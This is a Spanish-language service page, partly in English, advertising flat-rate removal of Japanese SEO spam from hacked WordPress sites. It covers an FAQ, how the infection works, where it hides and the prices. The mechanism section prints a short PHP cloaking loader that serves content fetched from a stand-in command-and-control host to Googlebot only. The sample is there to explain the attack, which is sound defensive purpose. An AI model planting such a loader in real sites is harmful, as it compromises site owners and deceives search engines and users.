¿Por qué Google muestra caracteres japoneses para mi sitio?

Un atacante inyectó páginas spam camufladas que sirven contenido en japonés a Googlebot mientras muestran tu sitio normal a los visitantes habituales. La inyección normalmente reescribe el sitemap de WordPress y añade cientos de URLs sintéticas que Googlebot luego rastrea e indexa.

¿Es el spam SEO japonés lo mismo que un pharma hack?

Mecánicamente similares — ambos son campañas de spam SEO que abusan de un sitio comprometido para backlinks y posicionamiento — pero el payload difiere. El spam SEO japonés empuja productos falsificados (a menudo en japonés). El pharma spam empuja páginas de disfunción eréctil y medicamentos con receta. El enfoque de limpieza es el mismo.

¿Volverá el spam después de la limpieza?

Not if the entry vector is closed. The infection usually arrives via a vulnerable plugin or stolen admin credential. Every cleanup includes vector identification and hardening so the same hole can't be reused.

¿Cuánto tarda Google en retirar los resultados malos?

Tras la limpieza, las URLs malas devuelven 404 y se retiran del índice en los siguientes ciclos de rastreo. Enviamos solicitudes de reconsideración a Google Safe Browsing y pedimos indexación a través de Search Console; el plazo lo marca Google, no nosotros, pero la mayoría de los sitios se recupera en unas semanas.

// SPAM SEO JAPONÉS · CAMUFLADO · LIMPIADO

Japanese SEO spam removal.

Eliminación manual de la inyección de spam SEO japonés. Limpieza de archivos y base de datos. Purga del sitemap. Vector de entrada identificado. Solicitudes de reconsideración enviadas. Tarifa plana $279.

Iniciar limpieza → Cómo funciona la infección

§ 01 — MECANISMO

Qué es el 'spam SEO japonés', técnicamente.

Un atacante planta un loader PHP en tu sitio (normalmente en wp-content/plugins/ o wp-content/uploads/). El loader genera miles de páginas sintéticas con keywords japonesas y títulos de producto japoneses. Reescribe tu sitemap para que Googlebot las encuentre. Los visitantes reales nunca ven el spam — el loader comprueba el User-Agent y sirve tu sitio normal a los humanos.

Para cuando te das cuenta, Google ha indexado cientos o miles de URLs en japonés en tu dominio. Search Console envía un aviso de seguridad por email. El posicionamiento cae. La etiqueta 'Hacked: Content injection' aparece en Search Console.

// LOADER DE CLOAKING TÍPICO

01 <?php
02 // Serve spam only to Googlebot. Real users see the normal site.
03 if (strpos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false) {
04     $payload = file_get_contents('https://spam-c2.example/jp/' . $_SERVER['REQUEST_URI']);
05     echo $payload;
06     exit;
07 }

§ 02 — QUÉ ELIMINAMOS

Cada lugar donde se esconde esta infección.

[ FILE LOADERS ]
PHP ofuscado en plugins, mu-plugins, temas y uploads. Leemos los diffs, no los nombres de archivo.
[ BASE DE DATOS ]
Contenido spam inyectado en wp_posts, entradas autoloaded maliciosas en wp_options, wp_usermeta sospechoso.
[ SITEMAP ]
Entradas sintéticas generadas en el sitemap eliminadas; sitemap limpio regenerado y reenviado a Search Console.
[ HTACCESS ]
Reglas de reescritura en .htaccess y nginx que redirigen Googlebot o rutas concretas — revertidas.
[ USUARIOS ADMIN ]
Cuentas de administrador durmientes creadas por el loader — eliminadas. Todos los secrets de admin restantes rotados.
[ VECTOR DE ENTRADA ]
Plugin vulnerable o credencial robada identificados y cerrados. Sin este paso, el mismo agujero se reutiliza en semanas.

§ PRECIOS

Tarifa plana $279. Pago único. Por sitio.

[ RESCUE ]

$279

TARIFA FIJA · ÚNICA · POR SITIO

Manual cleanup, entry-vector identification, written forensic report.

Iniciar limpieza →

[ SHIELD ]

$29 / mo

POR SITIO · CANCELA CUANDO QUIERAS

Monitorización continua, endurecimiento, una limpieza al año incluida.

Protégete →

Part of threatover's broader security practice. Penetration testing, bug bounty consulting, triage, and security advisory.

Ver todos los servicios →

Start an engagement.

Send the scope, stack, and timeline. You get a written proposal with a fixed quote.

Contacto →